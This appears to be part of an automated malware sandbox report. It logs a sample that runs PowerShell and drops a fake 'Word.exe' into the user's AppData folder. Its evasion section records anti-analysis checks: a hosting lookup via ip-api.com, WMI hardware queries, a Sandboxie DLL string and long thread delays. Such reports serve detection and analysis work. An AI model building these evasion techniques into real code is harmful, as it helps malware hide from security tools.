                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Word.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: file.exe, Word.exe.0.drBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 730000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 1A680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 1450000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 600000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 2A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 1AB30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 1750000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Word.exeMemory allocated: 1B080000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 7985Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1832Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5966Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3820Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7643Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1947Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8107Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1470Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8017
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1579
                    Source: C:\Users\user\Desktop\file.exe TID: 8168Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 8107 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 1470 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 8017 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 1579 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 1648Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 2056Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 1568Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Word.exe TID: 2176Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Word.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\Word.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Word.exeThread delayed: delay time: 922337203685477
